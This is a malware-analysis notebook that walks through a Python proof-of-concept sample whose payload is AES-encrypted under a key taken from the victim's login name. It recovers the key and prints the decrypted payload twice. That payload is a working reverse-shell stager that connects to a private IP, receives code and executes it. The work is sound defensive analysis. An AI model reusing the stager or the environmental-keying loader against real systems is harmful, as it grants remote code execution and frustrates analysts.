## Malware PoC with an environmental key
### Author: @JohnLaTwC
### Sample hash: 26876d11ec8296829bcce367356c448369fdcd280a67ee427a03052efca32dd5

This notebook explores a Python test malware sample uploaded to VT that uses an environmental key. What is that?  It is when the payload is encrypted and the decryption key is not hardcoded in the malware and instead comes from looking up something in the victim environment.  This would make analysis difficult if security researchers don't have access to the victim environment.

Reference:
<li> https://www.virustotal.com/gui/file/26876d11ec8296829bcce367356c448369fdcd280a67ee427a03052efca32dd5/detection
<li> https://www.virustotal.com/gui/file/4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2/detection
<li> See also 'clueless agents' https://twitter.com/VessOnSecurity/status/898227226126278656

In [ ]:
## First things first, run this cell to ensure you have the crypto libraries installed

!pip install pycrypto

In [2]:
# from 26876d11ec8296829bcce367356c448369fdcd280a67ee427a03052efca32dd5 (slightly neutered)
import base64,sys,os,hashlib;
from Crypto import Random;
from Crypto.Cipher import AES;

BLOCK_SIZE = 16
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)
unpad = lambda s: s[:-ord(s[len(s) - 1:])]	

def encrypt(raw, password):
    private_key = hashlib.sha256(password.encode("utf-8")).digest()
    raw = pad(raw)
    iv = Random.new().read(AES.block_size)
    cipher = AES.new(private_key, AES.MODE_CBC, iv)
    return base64.b64encode(iv + cipher.encrypt(raw))

def decrypt(enc, password):
    private_key = hashlib.sha256(password.encode("utf-8")).digest()
    enc = base64.b64decode(enc)
    iv = enc[:16]
    cipher = AES.new(private_key, AES.MODE_CBC, iv)
    return unpad(cipher.decrypt(enc[16:]))

def decode(envkey):
    if(hashlib.sha256(envkey.encode()).hexdigest() == '4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2'):
        payload = decrypt("iFJQf3QoXOLy5BOHVCeu0yW/WOclm/4Mk9FYZfERa+seBfbLqUU/tyyXxUaJUyezRkPC76PURK7RLaJc1YI0lsodEPXgfIt4SCZ/GP85YZEpAQgsaBqMR0GiazoJKiIo2/gP5kAvJk5ur90Y5aDsdYRUIEk0yVPxq3w383ZHMeMcaPkdBMgAQjEKUucEvBcAeG1mCvIt1RxEBZWd7Qu+Vqk/RqKnkz9VIngbCN1BbWuDVGJITxigkODbXFjBX7g0ghW98ONtJbDLHkoBhwc01KCTsYddTUw+kmmbdnWMVaBGRm7bJKMWG2iLUMF7QsNpPmCOvSiyKJS+cxcyQKPlBWOzrzTNrUEIO8b/fFMQBIepqkVAW2F8+5j2VNF2L1iRnsGS7V/otchKJyhqE0OA+0r31nDmeJjrSvVyq4bTbMVw269haW3FQnX0gyk3axexgWDSRyd3Zq6XdLe7qg0VViUAkCz3fq6huqYmN6NTpeV43OKCPD5axjFDRe05Ro9AA8ra5MQbV9e83yaqgqWKTNrulLpA46gmYZZq7ODzCT4TnbM0G7A1xNiEBQ3pjGhr7PlcQzNXneykREjm0jdzrA==",hashlib.sha256(envkey.encode()).hexdigest())
        print(base64.b64decode(payload).decode())
    else:
        print('Environmental key is not matched. Decryption not attempted')

We can see that decryption routine uses AES.MODE_CBC and a password. 
The encryption key is based on the value returned from os.login(). 
If your username does not match, the payload will not decrypt.
The SHA 256 of the username must match `4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2`

You can see the value derived from your username by modifying and running the cell below:

In [3]:
envkey =  'john'
print("Your key derived is %s" % hashlib.sha256(envkey.encode()).hexdigest())

Your key derived is 96d9632f363564cc3032521409cf22a852f2032eec099ed5967c0d000cec607a


Your next question may be: What username hashes to `4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2`? 
Well, one could try to brute force common user names. There is an easier way. Let's look up that hash value on VirusTotal.

[4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2](https://www.virustotal.com/gui/file/4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2/content/hex)

Turns out someone uploaded a file whose content hashes to our value. If you look at the content tab on VT, you see the content is the word `root`. Not a big surprise especially since this sample is a test proof-of-concept.

In [4]:
# let's decode the payload with the password `root`

envkey =  'root'
print("Your key derived from os.getlogin() is %s" % hashlib.sha256(envkey.encode()).hexdigest())
decode(envkey)

# We see that it is a reverse shell. The IP is in the private address range which makes sense for a PoC.

Your key derived from os.getlogin() is 4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2
#test
import socket,struct,time
#ok coool
for x in range(10):
#bien
	try:
		s=socket.socket(2,socket.SOCK_STREAM)
		s.connect(('192.168.1.71',3333))
		break
	except:
		time.sleep(5)
#slt
l=struct.unpack('>I',s.recv(4))[0]
#cparti mdr
d=s.recv(l)
#aller
while len(d)<l:
	d+=s.recv(l-len(d))
#ok
exec(d,{'s':s})
#end



# Bonus

There is an even easier way to decrypt the payload without knowing the username. Are you ready?

It has to do with how the payload was created. The environmental key is not the username itself. It is the <b>hash of the username</b>.

The code TELLS US the hash of the username in the `if` statement. So all we need to do is plug that in to the decryption routine!

```
    if(hashlib.sha256(envkey.encode()).hexdigest() == '4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2'):
        payload = decrypt("...",hashlib.sha256(envkey.encode()).hexdigest())
```

In [5]:
payload = decrypt("iFJQf3QoXOLy5BOHVCeu0yW/WOclm/4Mk9FYZfERa+seBfbLqUU/tyyXxUaJUyezRkPC76PURK7RLaJc1YI0lsodEPXgfIt4SCZ/GP85YZEpAQgsaBqMR0GiazoJKiIo2/gP5kAvJk5ur90Y5aDsdYRUIEk0yVPxq3w383ZHMeMcaPkdBMgAQjEKUucEvBcAeG1mCvIt1RxEBZWd7Qu+Vqk/RqKnkz9VIngbCN1BbWuDVGJITxigkODbXFjBX7g0ghW98ONtJbDLHkoBhwc01KCTsYddTUw+kmmbdnWMVaBGRm7bJKMWG2iLUMF7QsNpPmCOvSiyKJS+cxcyQKPlBWOzrzTNrUEIO8b/fFMQBIepqkVAW2F8+5j2VNF2L1iRnsGS7V/otchKJyhqE0OA+0r31nDmeJjrSvVyq4bTbMVw269haW3FQnX0gyk3axexgWDSRyd3Zq6XdLe7qg0VViUAkCz3fq6huqYmN6NTpeV43OKCPD5axjFDRe05Ro9AA8ra5MQbV9e83yaqgqWKTNrulLpA46gmYZZq7ODzCT4TnbM0G7A1xNiEBQ3pjGhr7PlcQzNXneykREjm0jdzrA==",
                  '4813494d137e1631bba301d5acab6e7bb7aa74ce1185d456565ef51d737677b2')
print(base64.b64decode(payload).decode())

#test
import socket,struct,time
#ok coool
for x in range(10):
#bien
	try:
		s=socket.socket(2,socket.SOCK_STREAM)
		s.connect(('192.168.1.71',3333))
		break
	except:
		time.sleep(5)
#slt
l=struct.unpack('>I',s.recv(4))[0]
#cparti mdr
d=s.recv(l)
#aller
while len(d)<l:
	d+=s.recv(l-len(d))
#ok
exec(d,{'s':s})
#end

